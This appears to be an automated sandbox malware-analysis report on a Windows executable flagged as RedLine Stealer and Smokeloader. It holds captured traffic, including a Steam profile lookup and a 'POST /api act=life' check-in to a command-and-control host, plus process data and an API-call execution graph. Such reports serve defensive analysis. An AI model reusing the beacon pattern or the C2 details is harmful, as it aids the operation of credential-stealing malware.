                                                                                                                                                                                                                                                      0192.168.2.54970423.55.153.1064436720C:\Users\user\Desktop\HK8IIasL9i.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-23 07:38:19 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                                                                      2024-12-23 07:38:20 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 07:38:20 GMT
                                                                                                                                                                                                                                                      Content-Length: 35121
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: sessionid=355ae53a3900853509b7ceaa; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                      2024-12-23 07:38:20 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                      2024-12-23 07:38:20 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                      Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                      2024-12-23 07:38:20 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                      Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      1192.168.2.549705104.21.66.864436720C:\Users\user\Desktop\HK8IIasL9i.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-23 07:38:22 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                      2024-12-23 07:38:22 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                                                                                      2024-12-23 07:38:22 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 07:38:22 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=u97340kie2m840aqalpa5d3sf0; expires=Fri, 18 Apr 2025 01:25:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sxo04tQaRrTIYq1JutzK6Y45W%2FOOT9HqjPCeAzI6%2FxbeYdYqeNoQCuTYVwNgq4%2B%2FZBWNEkfrIQ%2FL8MW2wjjOImbfa2Dt0PE%2BCePr4hlcDLmWcoNSE4slLxpAyogW7nPBrXE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f66b1118a498c4d-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1783&rtt_var=675&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1612368&cwnd=158&unsent_bytes=0&cid=fa74bfadbd00fe3a&ts=749&x=0"
                                                                                                                                                                                                                                                      2024-12-23 07:38:22 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 2ok
                                                                                                                                                                                                                                                      2024-12-23 07:38:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                      Start time:02:38:13
                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\HK8IIasL9i.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\HK8IIasL9i.exe"
                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                      File size:295'424 bytes
                                                                                                                                                                                                                                                      MD5 hash:7DC18A69DCDCA002579BFDE5D5427FF2
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2488177075.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                      Start time:02:38:23
                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 1728
                                                                                                                                                                                                                                                      Imagebase:0x550000
                                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:1.5%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:33%
                                                                                                                                                                                                                                                        Signature Coverage:36.4%
                                                                                                                                                                                                                                                        Total number of Nodes:88
                                                                                                                                                                                                                                                        Total number of Limit Nodes:7
                                                                                                                                                                                                                                                        execution_graph 25972 43aa80 25975 43d810 25972->25975 25974 43aa8a RtlAllocateHeap 25976 43d830 25975->25976 25976->25974 25976->25976 25977 40c583 CoInitializeSecurity 25978 43aaa0 25979 43aab3 25978->25979 25980 43aac4 25978->25980 25981 43aab8 RtlFreeHeap 25979->25981 25981->25980 25982 43c767 25983 43c790 25982->25983 25983->25983 25984 43c80e 25983->25984 25986 43c1f0 LdrInitializeThunk 25983->25986 25986->25984 25987 43cce6 25988 43cd00 25987->25988 25989 43cd6e 25988->25989 25994 43c1f0 LdrInitializeThunk 25988->25994 25993 43c1f0 LdrInitializeThunk 25989->25993 25992 43ce4d 25993->25992 25994->25989 25995 470000 25998 470006 25995->25998 25999 470015 25998->25999 26002 4707a6 25999->26002 26003 4707c1 26002->26003 26004 4707ca CreateToolhelp32Snapshot 26003->26004 26005 4707e6 Module32First 26003->26005 26004->26003 26004->26005 26006 4707f5 26005->26006 26007 470005 26005->26007 26009 470465 26006->26009 26010 470490 26009->26010 26011 4704a1 VirtualAlloc 26010->26011 26012 4704d9 26010->26012 26011->26012 26012->26012 26013 43c58a 26015 43c460 26013->26015 26014 43c5f4 26015->26014 26018 43c1f0 LdrInitializeThunk 26015->26018 26017 43c54d 26018->26017 26019 43c2c8 26020 43c2e0 GetForegroundWindow 26019->26020 26022 43ccbe 26020->26022 26023 73003c 26024 730049 26023->26024 26038 730e0f SetErrorMode SetErrorMode 26024->26038 26029 730265 26030 7302ce VirtualProtect 26029->26030 26032 73030b 26030->26032 26031 730439 VirtualFree 26036 7304be 26031->26036 26037 7305f4 LoadLibraryA 26031->26037 26032->26031 26033 7304e3 LoadLibraryA 26033->26036 26035 7308c7 26036->26033 26036->26037 26037->26035 26039 730223 26038->26039 26040 730d90 26039->26040 26041 730dad 26040->26041 26042 730dbb GetPEB 26041->26042 26043 730238 VirtualAlloc 26041->26043 26042->26043 26043->26029 26044 408850 26046 40885f 26044->26046 26045 408acf ExitProcess 26046->26045 26047 408ab8 26046->26047 26048 40891c GetCurrentProcessId GetCurrentThreadId 26046->26048 26057 43c160 FreeLibrary 26047->26057 26049 408941 26048->26049 26050 408945 SHGetSpecialFolderPathW GetForegroundWindow 26048->26050 26049->26050 26052 408a3d 26050->26052 26052->26047 26056 40c550 CoInitializeEx 26052->26056 26057->26045 26058 435972 26059 43599b 26058->26059 26061 4359c4 26059->26061 26062 43c1f0 LdrInitializeThunk 26059->26062 26062->26059 26063 43e7d0 26064 43e800 26063->26064 26067 43e87f 26064->26067 26069 43c1f0 LdrInitializeThunk 26064->26069 26065 43e94e 26067->26065 26070 43c1f0 LdrInitializeThunk 26067->26070 26069->26067 26070->26065 26071 43cb19 26072 43cb40 26071->26072 26073 43cbae 26072->26073 26075 43c1f0 LdrInitializeThunk 26072->26075 26075->26073 26076 40e71a CoUninitialize CoUninitialize 26077 40a03d 26078 40a130 26077->26078 26078->26078 26081 40acf0 26078->26081 26080 40a17f 26082 40ad80 26081->26082 26084 40ada5 26082->26084 26085 43c180 RtlAllocateHeap RtlFreeHeap 26082->26085 26084->26080 26085->26082

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 84 40acf0-40ad78 85 40ad80-40ad89 84->85 85->85 86 40ad8b-40ad9e 85->86 88 40b012-40b019 86->88 89 40ada5-40ada7 86->89 90 40b0e7-40b0f0 86->90 91 40b0f7-40b0fd 86->91 92 40adac-40afc7 86->92 93 40b09d-40b0b7 86->93 94 40b01e-40b096 call 407f00 86->94 95 40b0ff-40b10a 86->95 121 40b367-40b373 88->121 99 40b351-40b358 89->99 90->91 90->95 97 40b359 90->97 98 40b0be-40b0e2 call 43dbf0 90->98 101 40b341-40b344 90->101 102 40b1c4-40b1d1 90->102 103 40b268-40b289 call 43dbf0 90->103 104 40b1eb-40b1fa 90->104 105 40b22b-40b235 90->105 106 40b330 90->106 107 40b212-40b224 90->107 108 40b332-40b335 90->108 109 40b295-40b2b4 90->109 110 40b2f5-40b31b 90->110 111 40b375 90->111 112 40b2d6-40b2ee call 43c180 90->112 113 40b256-40b263 90->113 114 40b1d8-40b1df 90->114 115 40b33c 90->115 116 40b23c-40b254 call 43dbf0 90->116 117 40b37c 90->117 118 40b31d 90->118 119 40b141-40b164 91->119 100 40afd0-40aff2 92->100 93->97 93->98 94->90 94->91 94->93 94->95 94->97 94->98 94->101 94->102 94->103 94->104 94->105 94->106 94->107 94->108 94->109 94->110 94->111 94->112 94->113 94->114 94->115 94->116 94->117 94->118 120 40b110-40b13a 95->120 142 40b362-40b364 97->142 98->97 100->100 125 40aff4-40afff 100->125 140 40b34b 101->140 102->97 102->98 102->103 102->111 102->114 102->117 103->109 139 40b201-40b20b 104->139 105->97 105->98 105->103 105->111 105->113 105->114 105->116 105->117 107->97 107->98 107->101 107->103 107->105 107->106 107->108 107->109 107->110 107->111 107->112 107->113 107->114 107->115 107->116 107->117 107->118 108->97 108->98 108->101 108->103 108->111 108->113 108->114 108->115 108->116 108->117 135 40b2bd-40b2cf 109->135 124 40b322-40b328 110->124 111->117 112->97 112->98 112->101 112->103 112->106 112->108 112->110 112->111 112->113 112->114 112->115 112->116 112->117 112->118 113->101 114->104 115->101 116->113 132 40b383 117->132 118->124 129 40b170-40b1a1 119->129 120->120 128 40b13c-40b13f 120->128 121->99 124->106 143 40b002-40b00b 125->143 128->119 129->129 137 40b1a3-40b1bd 129->137 132->132 135->97 135->98 135->101 135->103 135->106 135->108 135->110 135->111 135->112 135->113 135->114 135->115 135->116 135->117 135->118 137->97 137->98 137->101 137->102 137->103 137->104 137->105 137->106 137->107 137->108 137->109 137->110 137->111 137->112 137->113 137->114 137->115 137->116 137->117 137->118 139->97 139->98 139->101 139->103 139->105 139->106 139->107 139->108 139->109 139->110 139->111 139->112 139->113 139->114 139->115 139->116 139->117 139->118 140->99 142->121 143->88 143->90 143->91 143->93 143->94 143->95 143->97 143->98 143->101 143->102 143->103 143->104 143->105 143->106 143->107 143->108 143->109 143->110 143->111 143->112 143->113 143->114 143->115 143->116 143->117 143->118
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: &K M$&wXy$'sZu$/O_q$Jk"m$e7o9$h? !
                                                                                                                                                                                                                                                        • API String ID: 0-2986092683
                                                                                                                                                                                                                                                        • Opcode ID: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
                                                                                                                                                                                                                                                        • Instruction ID: 590b8efa2b06f5e02b6b835ab0c7a13339e1eb4ce69d4453d365afcab8c45654
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D80286B5200B01DFD324CF25D891B97BBF1FB49705F108A2CE5AA8BAA0D775A845CF85

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 149 408850-408861 call 43bc60 152 408867-40888f call 408020 149->152 153 408acf-408ad1 ExitProcess 149->153 156 408890-4088cb 152->156 157 408904-408916 call 4354e0 156->157 158 4088cd-408902 156->158 161 408ab8-408abf 157->161 162 40891c-40893f GetCurrentProcessId GetCurrentThreadId 157->162 158->156 165 408ac1-408ac7 call 408030 161->165 166 408aca call 43c160 161->166 163 408941-408943 162->163 164 408945-408a3b SHGetSpecialFolderPathW GetForegroundWindow 162->164 163->164 168 408a6b-408aac call 409b00 164->168 169 408a3d-408a69 164->169 165->166 166->153 168->161 174 408aae call 40c550 168->174 169->168 176 408ab3 call 40b390 174->176 176->161
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0040891C
                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00408925
                                                                                                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00408A33
                                                                                                                                                                                                                                                          • Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                                                                                                                                                                                                                          • Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
                                                                                                                                                                                                                                                          • Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7
                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00408AD1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3072701918-0
                                                                                                                                                                                                                                                        • Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                                                                                                                                                                                                                        • Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 189 4707a6-4707bf 190 4707c1-4707c3 189->190 191 4707c5 190->191 192 4707ca-4707d6 CreateToolhelp32Snapshot 190->192 191->192 193 4707e6-4707f3 Module32First 192->193 194 4707d8-4707de 192->194 195 4707f5-4707f6 call 470465 193->195 196 4707fc-470804 193->196 194->193 201 4707e0-4707e4 194->201 199 4707fb 195->199 199->196 201->190 201->193
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 004707CE
                                                                                                                                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 004707EE
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488177075.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_470000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                        • Instruction ID: 5595ceff43f7b3773f2b5f76221f31d5ab95906f67ec572e80d6a2261ca759b8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6F0C231102310ABD7203AB5988CAAFB7ECAF49725F10852AE64A911C0DA78F8054A64

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 214 43c1f0-43c222 LdrInitializeThunk
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,+*)
                                                                                                                                                                                                                                                        • API String ID: 0-3529585375
                                                                                                                                                                                                                                                        • Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                                                                                                                                                                                                                                        • Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: o`
                                                                                                                                                                                                                                                        • API String ID: 0-3993896143
                                                                                                                                                                                                                                                        • Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
